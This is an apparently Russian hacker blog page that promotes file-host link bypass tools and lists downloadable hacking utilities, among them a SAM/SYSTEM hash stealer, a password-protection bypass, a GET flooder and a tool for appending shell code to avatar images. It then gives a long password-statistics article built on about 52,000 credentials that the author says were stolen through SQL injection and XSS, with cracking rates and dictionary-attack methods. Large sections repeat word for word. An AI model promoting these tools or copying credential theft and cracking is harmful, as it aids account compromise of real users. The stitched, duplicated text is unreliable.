Программа получает прямые ссылки для файлов, залитых на zShare.Net, LetitBit.Net, Uploading.Com и FriendlyFiles.Net - аналог LetitBit.Net . Полученные ссылки можно просто открывать в браузерах или вставлять в различного рода качалки и уходить спать. В результате НОВОГО алгоритма ссылки не привязаны к IP!

http://depositfiles.com/ru/files/3505874
Asylum 501 позволяет получать прямые ссылки к файлам сервиса LetItBit.net и скачивать их любым удобным для вас способом и на максимальной для вас скорости.

http://depositfiles.com/ru/files/3494367
добавлено через 16 часов 44 минуты
http://exnews.org/direct_download.html
Данная страничка позволит Вам получить прямые ссылки на файлы, залитые на LetItBit.net, Friendlyfiles.net, FileFactory.com, Uploading.com, Zshare.net, Dump.ru, YouTube.com, Bitroad.net, ShareOnAll.com и RuTube.ru.
FullURL (version 2.12) (Обновление от 12.02.08)
Программа получает прямые ссылки для файлов, залитых на zShare.Net, LetitBit.Net, Uploading.Com и FriendlyFiles.Net - аналог LetitBit.Net . Полученные ссылки можно просто открывать в браузерах или вставлять в различного рода качалки и уходить спать. В результате НОВОГО алгоритма ссылки не привязаны к IP!

http://depositfiles.com/ru/files/3505874
Asylum 501 позволяет получать прямые ссылки к файлам сервиса LetItBit.net и скачивать их любым удобным для вас способом и на максимальной для вас скорости.

http://depositfiles.com/ru/files/3494367
добавлено через 16 часов 44 минуты
http://exnews.org/direct_download.html
Данная страничка позволит Вам получить прямые ссылки на файлы, залитые на LetItBit.net, Friendlyfiles.net, FileFactory.com, Uploading.com, Zshare.net, Dump.ru, YouTube.com, Bitroad.net, ShareOnAll.com и RuTube.ru.
Метки: настройки
Прога черная и белая...
Ну, это прога шутка. Если её запустить, то к имени компа добавится нехорошее имя. Безвредна и, впринципе бесполезна, но малоли... пригодится кому-нить.
http://filezzzdb.by.ru/CCN.rar
Прога, которая может изменить пароль в Hide Folders XP (вроде на всех версиях работает) на "hack" и обратно. Что даёт возможность пролезть в запароленную папку и остаться незамеченным.
http://filezzzdb.by.ru/HackHFXP.rar
Прога кодирует текст в ASCII код и обратно. При взломе сайтов часто нужно кодировать строку, чтобы обойти фильтры.
http://filezzzdb.by.ru/Oh,my_Strings.rar
Если винда звпущена из-под админа, то эта прога спиздит SAM и SYSTEM файлы из repair. Полробнее описание внутри архива.
http://filezzzdb.by.ru/Spizdi_SAM.rar
Ну, тип флудер. Его можно использовать в разных целях. Отправляет заданные тобой GET запросы
http://hungry.front.ru/soft/gFLOODER.rar
Простенькая прога, которая дописывает в конец файла строчки. Она может понадобиться при взломе сайтов, например, когда нужно в конец аватора дописать код скрипта(шелла,например)
http://filezzzdb.by.ru/wteof.rar
Метки: настройки
Немного о паролях
Стоит чукча на посту, мимо кто-то проходит, чукча
- пароль
- 123456
- проходи
Современная версия известного анекдота.
Intro
В данной статье описываются результаты анализа паролей, которые используют пользователи для доступа к форумам, сайтам, электронной почте. Эти пароли не генерировались системой или назначались администратором, а их задавал сам пользователь при регистрации.
По моей просьбе, люди, знакомые по интернету, собрали базу данных для этого исследования. Во время стадии сбора информации в основном использовались уязвимости типа SQL-injection (позволяющие пользователю выполнять любые запросы к базе данных, установленной на сервере), XSS (cross-site-scripting, позволяет взломщику внедрить в страницу свой html-код, что дает возможность украсть cookies администратора и затем подделать сессию), а также простые оплошности системных администраторов, когда из-за неправильной конфигурации сервера базу данных мог просматривать любой человек.
В результате этой работы была собрана база данных вида логинпароль, содержащая 52125 записей. Большую часть (42920, 82,3%) из них представляли md5-хэши, остальные (9205, 17,7%) - пароли в виде plain-text (незашифрованные) или пароли, зашифрованные алгоритмами, допускающими построение обратной функции - то есть расшифровку (например base64). Использование в интернет-проекте публичных алгоритмов, позволяющих декриптовать пароль, не дает никакой защиты и, по сути, ничем не лучше хранения паролей в открытом виде.
В собранный базе данных есть пароли, заданные пользователями разных наций, но подавляющее большинство приходится на русских (около 40%) и американцев (почти 20%), остальные - в основном европейцы (немцы, поляки, чехи, англичане). Азиатов - единицы.
Атака на MD5
После сбора информации для проведения анализа необходимо было взломать хотя бы некоторую часть полученных md5-хэшей. Для тех, кто не сведущ в криптографии или программировании, попытаюсь объяснить суть этого алгоритма. Приведем общее определение хэш-функции - это преобразование, которое позволяет из данных произвольной длины получить некое значение фиксированной длины. Известный пример такой функции - crc32, контрольная сумма файла. Хэш-функции также бывают криптографическими и программистскими. Нас интересует первый вариант. Основными свойствами хэш-функций, применяемых в криптографии, являются необратимость и свободность от коллизий. Необратимость означает, что нельзя разработать алгоритм, который на основе известного хэша позволяет получить исходные данные (грубо говоря, зная хэш пароля, получить сам пароль). Свободность от коллизий - практическую невозможность подобрать два разных исходных аргумента, значение хэш-функции для которых будет одинаковым. MD5 - публичный алгоритм, являющийся криптографической хэш-функцией, поэтому единственный возможный тип атаки на него - зашифровка всех возможных значений пароля и сравнение полученного результата с известным хэшем. Более подробно об алгоритме md5 можно почитать в RFC1321 (www.faqs.orgrfcsrfc1321.html).
Для взлома md5-хэшей я использовал программу Passwords Pro v1.2.0.1 (httpwww.InsidePro.com). С ее помощью удалось взломать 21249 паролей из 42920 (49,5%). Уже исходя из этих данных можно утверждать, что почти половина всех используемых сейчас паролей - ненадежные. Были подобраны все пароли, длина которых менее 5 символов и все численные пароли, длина которых менее 10 символов. Заявленная разработчкиком скорость для разных процессоров
Intel Pentium-III 1000 MHz ~2,2 миллиона паролейсекунду
AMD AthlonXP 1700+ (1466 MHz) ~3,6 миллиона паролейсекунду
Intel Pentium-4 2400 MHz ~4,0 миллиона паролейсекунду
Реальная скорость перебора для моего компьютера (AMD AthlonXP 1600+) составляла около 3,2 миллионов паролей в секунду для взлома одного пароля и падала приблизительно до 200 тысяч паролей в секунду при одновременном взломе 8000 паролей (это происходит из-за того, что программе необходимо сравнить значение хэш-функции, полученное для проверяемого пароля, со всеми известными хэшами, загруженными в нее). Максимальное время, требующееся для подбора пароля, рассчитывается по следующей формуле
[image]
где N - количество символов в наборе, из которого составляется пароль, L - предельная длина пароля, S - число проверок в секунду. Например, если рассчитать по этой формуле время, которое потребуется для перебора всех численных паролей длиной до 9 символов (S=3106, N=10 (цифры), i=8), то получим всего лишь 37 секунд.
Однако метод полного перебора всех возможных комбинаций хорош либо для малого числа символов в наборе, либо для паролей небольшой длины (4-5 символов). Так для перебора на обычном компьютере всех возможных паролей (могут включать 224 печатных символа) максимальной длинной 6 символов уже требуются 490 суток.
Кроме атаки полным перебором использовалась атака по словарю, когда возможные пароли не генерируются программой, а берутся из файла-словаря, заранее составленного пользователем.
Анализ
Из полученной базы были удалены записи, с одинаковыми логинами и паролями. Вероятность того, что эти учетные записи были созданы одним и тем же человеком, довольна мала, но я решил все-таки учесть и ее. В результате всего было проанализировано 30,450 паролей разных пользователей. Для сбора статистики была написана специальная программа, так как обработать вручную такой массив данных не представляется реальным.
Популярные пароли. 15 самых популярных паролей и количество пользователей, избравших их, приведено ниже
123456 - 449 пользователей
123 - 303 пользователя
12345 - 288 пользователя
qwerty - 206 пользователей
12345678 - 148 пользователей
111 - 113 пользователей
1234 - 103 пользователя
666 - 85 пользователей
123321 - 77 пользователей
1111 - 77 пользователей
111111 - 76 пользователей
gfhjkm - 76 пользователей
password - 71 пользователь
1234567 - 69 пользователей
777 - 65 пользователей
Более полный список (50 самых популярных) может быть найден в интернете на httpwww.x-hack.ruAntalospopular.... Исходя из этих данных, можно сказать, что в целом за последние время наблюдается упрощение паролей, используемых пользователями. Так, по данным, собранным Solar Designer, в начале 90-х самыми популярными паролями являлись
12345
abc123
password
passwd
123456
newpass
notused
Hockey
Internet
Конечно, приведенные пароли также не надежны, но среди них нет ни одного длиной менее 4 символов или состоящего из одинаковых цифр (111).
Логин в пароле. Целых 729 (2%) паролей оказались абсолютно идентичными имени пользователя, не изменялся даже регистр букв (m2t4m2t4, salavatsalavat). Еще 314 представляли собой различные модификации логина - добавление однойнескольких цифр в начале или конце (jotum1jotum, skizskiz57); запись всего логина или его части в обратном порядке (chap118811pahc, zoran58naroz85); добавление фамилии к имени (koreykoreyblake); запись в другом регистре (dorofeyOROFEY). При желании взломщик может собрать дополнительную информацию о пользователе (благо сделать это не так уж и сложно), и перебрать возможные варианты. Если учесть что в большинстве случаев добавляют сочетания вроде 1, 123 или год рождения, а процесс генерации подобных комбинаций можно автоматизировать, то такие пароли являются небезопасными и могут быть подобраны довольно быстро.
Атака по словарю. Большинство пользователей выбирают пароль, который несет какую-то смысловую нагрузку, что позволяет взломщику использовать атаку по словарю - перебор паролей из заранее составленного списка. Как основу для составления такого списка зачастую используют толковые словари языка, также распространена практика составления словарей по художественной литературе. Во втором случае, из книги в электронном формате с помощью специальной программы выбираются все использованные в ней слова, за исключением форм слова в разном числе или падеже. Второй подход считается более продуктивным, так как он позволяет собрать активно используемый лексикон языка, а списки на основе различных словарей получаются большими, но большая часть времени уйдет на проверку вариантов, которые фактически не используются в качестве паролей (специальные термины и т.п.). Также составляют списки наиболее употребляемых паролей, в которые могут входить и числа.
Модификация слова (запись в обратном порядке, удвоение, добавление цифр и т.п.) не спасает, так как с помощью написанной за 10 минут программы или готового софта на основе базового словаря можно быстро сгенерировать все эти варианты и проверить. Существуют даже программы, которые заменяют буквы схожими по начертанию цифры (coolpass станет c00lpa55). Так что такие, казалось бы надежные, уловки не приводят к повышению устойчивости используемого пароля. Не думайте, что вы окажетесь умнее взломщика. Если хотите сделать свой пароль неуязвимым к словарной атаке - выбирайте бессмысленные комбинации символов.
В моем случае по словарям удалось подобрать 14176 (46,5%) паролей. Как видно, почти половина пользователей выбирает осмысленный пароль. Из этих паролей 6938 (22,8% от всех паролей) были подобраны всего лишь по двум маленьким словарям, в которые входят самые популярные пароли. Приведу краткую статистику по словарям, которые оказались наиболее эффективными (через запятую указано количество слов в словаре, затем число подобранных паролей)
популярные пароли, 2153 - 5068
более полный словарь популярных паролей, 13958 - 6924
названия рок-групп и имена музыкантов, 12340 - 890
имена разных народов, 39132 - 1357
русские слова, набранные в английской раскладке, 138204 - 1406
русские слова, набранные транслитом, 138204 - 1958
слова разных народов, 3,162,009- 10685
слова разных народов, записанные в обратном порядке, 3,162,009 - 9223
Стоит упомянуть, что по словарю, который использовался червем Морриса (419 слов), было подобрано всего 389 паролей. А в 1988 году этот вирус смог поразить 6200 компьютеров, это еще раз показывает, что наиболее употребляемые пароли изменяются с течением времени.
Более полную статистику по использованным словарям можно посмотреть в интернете на httpx-hack.ruAntalosdics.html.
Статистика по длине и составу паролей. В результате анализа пароля по их длине и составу была создана таблица, в которой можно наглядно увидеть наиболее популярные типы паролей. Во второй колонке указывается количество символов в наборе, из которого составлен пароль, что удобно для некоторых расчетов. Так, чтобы вычислить количество паролей определенного типа, необходимо рассчитать число размещений с повторениями, что делается по следующей формуле
P=nr
где P - количество размещений (паролей), n - количество элементов множества, из которого осуществляется выборка (символов в наборе), r - число элементов (максимальная длина пароля).
длина пароля
состав пароля символов
в наборе=3 4 5 6 7 8 8 сумма %
мал. 26 616 1371 2063 4180 2664 2663 768 14325 47,09
цифры 10 1003 1747 1309 4712 1441 2289 119 12620 41,48
мал.+цифры 36 24 134 314 572 392 623 305 2364 7,77
малые+бол. 52 18 59 80 117 67 88 37 466 1,53
бол. 26 34 58 37 42 21 17 1 210 0,69
мал.+бол.+цифры 62 2 2 4 21 21 43 27 120 0,39
мал+спец 58 1 18 21 13 27 18 11 109 0,36
кириллица 66 5 8 30 12 12 8 7 82 0,27
бол.+цифры 36 1 10 14 15 6 11 10 67 0,22
спец.символы 32 13 4 0 2 1 0 0 20 0,07
мал+бол+спец 84 0 0 6 3 2 3 1 15 0,05
мал+спец+цифры 68 0 3 0 0 1 2 4 10 0,03
цифры+спец 42 5 1 0 0 0 2 0 8 0,03
мал+бол+сп+циф 94 0 0 0 0 1 0 3 4 0,01
бол+спец 58 0 1 0 0 0 0 1 2 0,01
сумма 1722 3416 3878 9689 4656 5767 1294 30422
% 5,66 11,23 12,75 31,85 15,30 18,96 4,25
Некоторые пояснения - через мал. и бол. обозначены строчные и прописные латинские буквы соответственно. Спец. - спецсимволы (например !@#). В строку кириллица вошли пароли, содержащие в себе символы русского или других национальных алфавитов, но не обязательно полностью состоящие из них (то есть пароль паroL12 также подпадает под эту графу). В сводную таблицу не вошли 28 паролей, содержащих символы, единственный способ ввода которых - использование дополнительной клавиатуры, для введения символа через его код, например ®.
Из приведенной таблицы несложно сделать выводы - самая популярная длинна пароля - 6 символов, состав - малые латинские символы или цифры. Более того, длина 85,6 процентов всех паролей менее 8 символов, а состоят они из малых букв или цифр (в таблице выделены оранжевым). Подсчитаем время, которое необходимо для взлома md5-хэшей таких паролей на локальном компьютере. За среднюю скорость возьмем 3 миллиона вариантов в секунду, тогда по уже известной формуле получим
Для малых букв 20,109 (часов)
Для цифр 0,01 (часов)
То есть, грубо говоря, вероятность того, что вы менее чем за сутки взломаете среднестатистический пароль, зная его md5-хэш, - 85%!
Еще несколько фактов. Среди собранных паролей оказались 53 пароля системных администратора (логины admin, administrator, webmaster). На общем фоне их пароли кажутся более надежными, но большая часть уязвима для атаки по словарю.
Основные правила, применяемые пользователями, для генерации пароля путем изменения словарного слова или логина
добавление цифры в начале иили конце пароля (в большинстве случаев - 0,1,…,9; 1,12,123,…; 00,11,…,99; 10,20,…,90; зачастую - год рождения)
зеркалирование (matrix=xirtam)
умножение слова, возможны разделители (moneymoney; zero-zero)
умножение с зеркалированием (pepperreppep)
запись в другой раскладке (валера =dfkthf)
эксперименты с регистром букв (eXcesS)
замена букв на цифры, схожие но начертанию (1slam)
запись прямымобратным транслитом (морж = morzh; billgates = биллгейтс)
Возможно применение нескольких правил одновременно, но даже это не дает надежной защиты от атаки по словарю, так как взломщик может модифицировать исходный пароль тем же самым путем.
Мне показалось интересным то, что популярные пароли могут изменяться с течением времени. Связано это с несколькими причинами. Популярное в реальной жизни становится распространено и в виртуальной. Так пароль matrix, который в конце 80-х - начале 90-х использовали разве что математики, с выходом одноименного фильма занимает 29 место в списке популярных паролей. Точно также влияют на выбор пароля и известные музыкальные группы (tatu), книги (Pelevin), программы (windows). Еще одним важным фактором является популяризация интернета в целом - в сеть приходит множество новых людей, которые могут и не иметь понятия о компьютерной безопасности. Это приводит к широкому использованию простейших паролей, а следовательно и увеличению числа взломов.
Coda
Проанализировав довольно большое количество паролей, я хотел бы дать несколько советов, которые, как мне кажутся, помогут вам избежать утечки информации. Многие из них банальны, но как показала практика не соблюдаются в большинстве случаев, поэтому напомнить их будет не лишним.
Советы пользователям. Самый важный совет - никогда не используйте одинаковые пароли для доступа к разным системам! Даже если он кажется абсолютно устойчивым и надежным, например V1!2cEqP,@#19r. Взломщик может получить ваш пароль для доступа к одной системе, используя какую-либо уязвимость в ней. И это будет не ваша вина, а вина программистов. Но если он, получив один пароль, сможет получить контроль над всей вашей деятельностью в сети - это будет целиком на вашей совести.
Теперь поговорим о выборе пароля. Никогда не используйте пароли, состоящие только из цифр. Количество возможных комбинаций из цифр невелико (при желании - рассчитайте его по формуле) и такой пароль может быть подобран относительно быстро даже при удаленной атаке. Проверьте пароль, используемый вами - если в свободной таблице он попадает в оранжевые ячейки, то можно утверждать, что он не надежен. Ваша цель при создании пароля - достичь максимально разумного числа символов в исходном наборе (используйте разный регистр и специальные символы). Не используйте осмысленные пароли и их модификации. Взломщику не составит большого труда подобрать его. Не думайте, что система блокирования IP-адреса после определенного числа попыток войти в систему с неверным паролем защитит вас - посмотрите список прокси-серверов на httpsamair.ruproxy и убедитесь, что это лишь ширма, а не защита.
Если ваш пароль ненадежен - смените его сейчас, не ждите, пока кто-нибудь получит доступ к вашей конфиденциальной информации. Вполне возможно, что уже сейчас почта с вашего почтового ящика перенаправляется конкурентам, а вы даже не подозреваете об этом. Очень рекомендуется менять пароли для доступа к важным для вас сервисам хотя бы раз в месяц.
Еще один важный аспект защиты - системы восстановления забытых паролей. Многие выбирают вполне достойные пароли, которые не по зубам взломщикам, но оказываются уязвимыми через эти системы.
Во-первых, никогда не указывайте несуществующий ящик в качестве альтернативного почтового адреса, на который будет высылаться пароль, - взломщик может воспользоваться этим. Зарегистрировав этот аккаунт на себя, получение вашего пароля будет делом нескольких минут. Во-вторых, очень важным является контрольный вопрос, который позволяет восстановить забытый пароль. Никогда не указывайте в ответе на него свои личные данные (год рождения, кличку собаки, девичью фамилию матери) - взломщик может с легкостью получить эту информацию, используя либо поиск в интернете, либо социальную инженерию. Во втором случае вы или ваши близкие (сослуживцы, родственники) сами с удовольствием раскроете взломщику эту информацию. Идеальным вариантом будет указать в ответе на контрольный вопрос случайный набор символов.
Еще несколько банальных советов. Регулярно обновляйте антивирусный софт, установите на ваш компьютер файрвол. Используйте альтернативный браузер (Opera) и почтовый клиент (The Bat!). Львиная доля уязвимостей в ПО, используемых взломщиками, приходится на продукты компании Microsoft.
Советы администратору. Введите систему контроля над паролями, которые выбирают пользователи. Лучше всего требовать наличия в нем букв и цифр, причем цифр не в начале или конце пароля, а в середине (хотя это и не убережет от паролей типа pass123pass, но множество глупых паролей будет отсеяно). Ограничивайте минимальную длину пароля хотя бы шестью символами. Не ограничивайте максимальную длину пароля (на мой взгляд, все разумные причины для этого не актуальны на текущей стадии развития аппаратного обеспечения).
Продумайте систему восстановления забытых паролей. Я считаю, что восстановление путем ответа на контрольный вопрос - недостаточно надежная схема. Множество паролей взламывается именно через контрольный вопрос. Если вы не хотите потом разбираться, кому на самом деле принадлежит учетная запись, не используйте такую систему. На мой взгляд, хороший метод восстановления пароля - это высылка на указанный при регистрации почтовый ящик. Желательно высылать не старый пароль, а заново сгенерированный. Это поможет избежать шпионажа или действий от лица другого человека, а также взлома аккаунтов пользователя на других системах.
В большинстве сетевых приложений сейчас используется аутентификация на базе алгоритма md5, который, хоть и надежен, довольно неустойчив при использовании слабых паролей. Существует разные системы для защиты хэшей, хранящихся в базе данных, от взлома методом грубой силы. Например я встречал такой совет храните не весь хэш, а лишь его первые 16 символов, что затруднит атакующему ввод таких огрызков в программу для взлома, а вероятность совпадения первых 16 байт для разных паролей довольно мала. Более того, я встречал такой метод реализованным на практике. Это не самый лучший выход, так как допускает коллизионность паролей, а реальных препятствий взломщику не создает никаких.
- пароль
- 123456
- проходи
Современная версия известного анекдота.
Intro
В данной статье описываются результаты анализа паролей, которые используют пользователи для доступа к форумам, сайтам, электронной почте. Эти пароли не генерировались системой или назначались администратором, а их задавал сам пользователь при регистрации.
По моей просьбе, люди, знакомые по интернету, собрали базу данных для этого исследования. Во время стадии сбора информации в основном использовались уязвимости типа SQL-injection (позволяющие пользователю выполнять любые запросы к базе данных, установленной на сервере), XSS (cross-site-scripting, позволяет взломщику внедрить в страницу свой html-код, что дает возможность украсть cookies администратора и затем подделать сессию), а также простые оплошности системных администраторов, когда из-за неправильной конфигурации сервера базу данных мог просматривать любой человек.
В результате этой работы была собрана база данных вида логинпароль, содержащая 52125 записей. Большую часть (42920, 82,3%) из них представляли md5-хэши, остальные (9205, 17,7%) - пароли в виде plain-text (незашифрованные) или пароли, зашифрованные алгоритмами, допускающими построение обратной функции - то есть расшифровку (например base64). Использование в интернет-проекте публичных алгоритмов, позволяющих декриптовать пароль, не дает никакой защиты и, по сути, ничем не лучше хранения паролей в открытом виде.
В собранный базе данных есть пароли, заданные пользователями разных наций, но подавляющее большинство приходится на русских (около 40%) и американцев (почти 20%), остальные - в основном европейцы (немцы, поляки, чехи, англичане). Азиатов - единицы.
Атака на MD5
После сбора информации для проведения анализа необходимо было взломать хотя бы некоторую часть полученных md5-хэшей. Для тех, кто не сведущ в криптографии или программировании, попытаюсь объяснить суть этого алгоритма. Приведем общее определение хэш-функции - это преобразование, которое позволяет из данных произвольной длины получить некое значение фиксированной длины. Известный пример такой функции - crc32, контрольная сумма файла. Хэш-функции также бывают криптографическими и программистскими. Нас интересует первый вариант. Основными свойствами хэш-функций, применяемых в криптографии, являются необратимость и свободность от коллизий. Необратимость означает, что нельзя разработать алгоритм, который на основе известного хэша позволяет получить исходные данные (грубо говоря, зная хэш пароля, получить сам пароль). Свободность от коллизий - практическую невозможность подобрать два разных исходных аргумента, значение хэш-функции для которых будет одинаковым. MD5 - публичный алгоритм, являющийся криптографической хэш-функцией, поэтому единственный возможный тип атаки на него - зашифровка всех возможных значений пароля и сравнение полученного результата с известным хэшем. Более подробно об алгоритме md5 можно почитать в RFC1321 (www.faqs.orgrfcsrfc1321.html).
Для взлома md5-хэшей я использовал программу Passwords Pro v1.2.0.1 (httpwww.InsidePro.com). С ее помощью удалось взломать 21249 паролей из 42920 (49,5%). Уже исходя из этих данных можно утверждать, что почти половина всех используемых сейчас паролей - ненадежные. Были подобраны все пароли, длина которых менее 5 символов и все численные пароли, длина которых менее 10 символов. Заявленная разработчкиком скорость для разных процессоров
Intel Pentium-III 1000 MHz ~2,2 миллиона паролейсекунду
AMD AthlonXP 1700+ (1466 MHz) ~3,6 миллиона паролейсекунду
Intel Pentium-4 2400 MHz ~4,0 миллиона паролейсекунду
Реальная скорость перебора для моего компьютера (AMD AthlonXP 1600+) составляла около 3,2 миллионов паролей в секунду для взлома одного пароля и падала приблизительно до 200 тысяч паролей в секунду при одновременном взломе 8000 паролей (это происходит из-за того, что программе необходимо сравнить значение хэш-функции, полученное для проверяемого пароля, со всеми известными хэшами, загруженными в нее). Максимальное время, требующееся для подбора пароля, рассчитывается по следующей формуле
[image]
где N - количество символов в наборе, из которого составляется пароль, L - предельная длина пароля, S - число проверок в секунду. Например, если рассчитать по этой формуле время, которое потребуется для перебора всех численных паролей длиной до 9 символов (S=3106, N=10 (цифры), i=8), то получим всего лишь 37 секунд.
Однако метод полного перебора всех возможных комбинаций хорош либо для малого числа символов в наборе, либо для паролей небольшой длины (4-5 символов). Так для перебора на обычном компьютере всех возможных паролей (могут включать 224 печатных символа) максимальной длинной 6 символов уже требуются 490 суток.
Кроме атаки полным перебором использовалась атака по словарю, когда возможные пароли не генерируются программой, а берутся из файла-словаря, заранее составленного пользователем.
Анализ
Из полученной базы были удалены записи, с одинаковыми логинами и паролями. Вероятность того, что эти учетные записи были созданы одним и тем же человеком, довольна мала, но я решил все-таки учесть и ее. В результате всего было проанализировано 30,450 паролей разных пользователей. Для сбора статистики была написана специальная программа, так как обработать вручную такой массив данных не представляется реальным.
Популярные пароли. 15 самых популярных паролей и количество пользователей, избравших их, приведено ниже
123456 - 449 пользователей
123 - 303 пользователя
12345 - 288 пользователя
qwerty - 206 пользователей
12345678 - 148 пользователей
111 - 113 пользователей
1234 - 103 пользователя
666 - 85 пользователей
123321 - 77 пользователей
1111 - 77 пользователей
111111 - 76 пользователей
gfhjkm - 76 пользователей
password - 71 пользователь
1234567 - 69 пользователей
777 - 65 пользователей
Более полный список (50 самых популярных) может быть найден в интернете на httpwww.x-hack.ruAntalospopular.... Исходя из этих данных, можно сказать, что в целом за последние время наблюдается упрощение паролей, используемых пользователями. Так, по данным, собранным Solar Designer, в начале 90-х самыми популярными паролями являлись
12345
abc123
password
passwd
123456
newpass
notused
Hockey
Internet
Конечно, приведенные пароли также не надежны, но среди них нет ни одного длиной менее 4 символов или состоящего из одинаковых цифр (111).
Логин в пароле. Целых 729 (2%) паролей оказались абсолютно идентичными имени пользователя, не изменялся даже регистр букв (m2t4m2t4, salavatsalavat). Еще 314 представляли собой различные модификации логина - добавление однойнескольких цифр в начале или конце (jotum1jotum, skizskiz57); запись всего логина или его части в обратном порядке (chap118811pahc, zoran58naroz85); добавление фамилии к имени (koreykoreyblake); запись в другом регистре (dorofeyOROFEY). При желании взломщик может собрать дополнительную информацию о пользователе (благо сделать это не так уж и сложно), и перебрать возможные варианты. Если учесть что в большинстве случаев добавляют сочетания вроде 1, 123 или год рождения, а процесс генерации подобных комбинаций можно автоматизировать, то такие пароли являются небезопасными и могут быть подобраны довольно быстро.
Атака по словарю. Большинство пользователей выбирают пароль, который несет какую-то смысловую нагрузку, что позволяет взломщику использовать атаку по словарю - перебор паролей из заранее составленного списка. Как основу для составления такого списка зачастую используют толковые словари языка, также распространена практика составления словарей по художественной литературе. Во втором случае, из книги в электронном формате с помощью специальной программы выбираются все использованные в ней слова, за исключением форм слова в разном числе или падеже. Второй подход считается более продуктивным, так как он позволяет собрать активно используемый лексикон языка, а списки на основе различных словарей получаются большими, но большая часть времени уйдет на проверку вариантов, которые фактически не используются в качестве паролей (специальные термины и т.п.). Также составляют списки наиболее употребляемых паролей, в которые могут входить и числа.
Модификация слова (запись в обратном порядке, удвоение, добавление цифр и т.п.) не спасает, так как с помощью написанной за 10 минут программы или готового софта на основе базового словаря можно быстро сгенерировать все эти варианты и проверить. Существуют даже программы, которые заменяют буквы схожими по начертанию цифры (coolpass станет c00lpa55). Так что такие, казалось бы надежные, уловки не приводят к повышению устойчивости используемого пароля. Не думайте, что вы окажетесь умнее взломщика. Если хотите сделать свой пароль неуязвимым к словарной атаке - выбирайте бессмысленные комбинации символов.
В моем случае по словарям удалось подобрать 14176 (46,5%) паролей. Как видно, почти половина пользователей выбирает осмысленный пароль. Из этих паролей 6938 (22,8% от всех паролей) были подобраны всего лишь по двум маленьким словарям, в которые входят самые популярные пароли. Приведу краткую статистику по словарям, которые оказались наиболее эффективными (через запятую указано количество слов в словаре, затем число подобранных паролей)
популярные пароли, 2153 - 5068
более полный словарь популярных паролей, 13958 - 6924
названия рок-групп и имена музыкантов, 12340 - 890
имена разных народов, 39132 - 1357
русские слова, набранные в английской раскладке, 138204 - 1406
русские слова, набранные транслитом, 138204 - 1958
слова разных народов, 3,162,009- 10685
слова разных народов, записанные в обратном порядке, 3,162,009 - 9223
Стоит упомянуть, что по словарю, который использовался червем Морриса (419 слов), было подобрано всего 389 паролей. А в 1988 году этот вирус смог поразить 6200 компьютеров, это еще раз показывает, что наиболее употребляемые пароли изменяются с течением времени.
Более полную статистику по использованным словарям можно посмотреть в интернете на httpx-hack.ruAntalosdics.html.
Статистика по длине и составу паролей. В результате анализа пароля по их длине и составу была создана таблица, в которой можно наглядно увидеть наиболее популярные типы паролей. Во второй колонке указывается количество символов в наборе, из которого составлен пароль, что удобно для некоторых расчетов. Так, чтобы вычислить количество паролей определенного типа, необходимо рассчитать число размещений с повторениями, что делается по следующей формуле
P=nr
где P - количество размещений (паролей), n - количество элементов множества, из которого осуществляется выборка (символов в наборе), r - число элементов (максимальная длина пароля).
длина пароля
состав пароля символов
в наборе=3 4 5 6 7 8 8 сумма %
мал. 26 616 1371 2063 4180 2664 2663 768 14325 47,09
цифры 10 1003 1747 1309 4712 1441 2289 119 12620 41,48
мал.+цифры 36 24 134 314 572 392 623 305 2364 7,77
малые+бол. 52 18 59 80 117 67 88 37 466 1,53
бол. 26 34 58 37 42 21 17 1 210 0,69
мал.+бол.+цифры 62 2 2 4 21 21 43 27 120 0,39
мал+спец 58 1 18 21 13 27 18 11 109 0,36
кириллица 66 5 8 30 12 12 8 7 82 0,27
бол.+цифры 36 1 10 14 15 6 11 10 67 0,22
спец.символы 32 13 4 0 2 1 0 0 20 0,07
мал+бол+спец 84 0 0 6 3 2 3 1 15 0,05
мал+спец+цифры 68 0 3 0 0 1 2 4 10 0,03
цифры+спец 42 5 1 0 0 0 2 0 8 0,03
мал+бол+сп+циф 94 0 0 0 0 1 0 3 4 0,01
бол+спец 58 0 1 0 0 0 0 1 2 0,01
сумма 1722 3416 3878 9689 4656 5767 1294 30422
% 5,66 11,23 12,75 31,85 15,30 18,96 4,25
Некоторые пояснения - через мал. и бол. обозначены строчные и прописные латинские буквы соответственно. Спец. - спецсимволы (например !@#). В строку кириллица вошли пароли, содержащие в себе символы русского или других национальных алфавитов, но не обязательно полностью состоящие из них (то есть пароль паroL12 также подпадает под эту графу). В сводную таблицу не вошли 28 паролей, содержащих символы, единственный способ ввода которых - использование дополнительной клавиатуры, для введения символа через его код, например ®.
Из приведенной таблицы несложно сделать выводы - самая популярная длинна пароля - 6 символов, состав - малые латинские символы или цифры. Более того, длина 85,6 процентов всех паролей менее 8 символов, а состоят они из малых букв или цифр (в таблице выделены оранжевым). Подсчитаем время, которое необходимо для взлома md5-хэшей таких паролей на локальном компьютере. За среднюю скорость возьмем 3 миллиона вариантов в секунду, тогда по уже известной формуле получим
Для малых букв 20,109 (часов)
Для цифр 0,01 (часов)
То есть, грубо говоря, вероятность того, что вы менее чем за сутки взломаете среднестатистический пароль, зная его md5-хэш, - 85%!
Еще несколько фактов. Среди собранных паролей оказались 53 пароля системных администратора (логины admin, administrator, webmaster). На общем фоне их пароли кажутся более надежными, но большая часть уязвима для атаки по словарю.
Основные правила, применяемые пользователями, для генерации пароля путем изменения словарного слова или логина
добавление цифры в начале иили конце пароля (в большинстве случаев - 0,1,…,9; 1,12,123,…; 00,11,…,99; 10,20,…,90; зачастую - год рождения)
зеркалирование (matrix=xirtam)
умножение слова, возможны разделители (moneymoney; zero-zero)
умножение с зеркалированием (pepperreppep)
запись в другой раскладке (валера =dfkthf)
эксперименты с регистром букв (eXcesS)
замена букв на цифры, схожие но начертанию (1slam)
запись прямымобратным транслитом (морж = morzh; billgates = биллгейтс)
Возможно применение нескольких правил одновременно, но даже это не дает надежной защиты от атаки по словарю, так как взломщик может модифицировать исходный пароль тем же самым путем.
Мне показалось интересным то, что популярные пароли могут изменяться с течением времени. Связано это с несколькими причинами. Популярное в реальной жизни становится распространено и в виртуальной. Так пароль matrix, который в конце 80-х - начале 90-х использовали разве что математики, с выходом одноименного фильма занимает 29 место в списке популярных паролей. Точно также влияют на выбор пароля и известные музыкальные группы (tatu), книги (Pelevin), программы (windows). Еще одним важным фактором является популяризация интернета в целом - в сеть приходит множество новых людей, которые могут и не иметь понятия о компьютерной безопасности. Это приводит к широкому использованию простейших паролей, а следовательно и увеличению числа взломов.
Coda
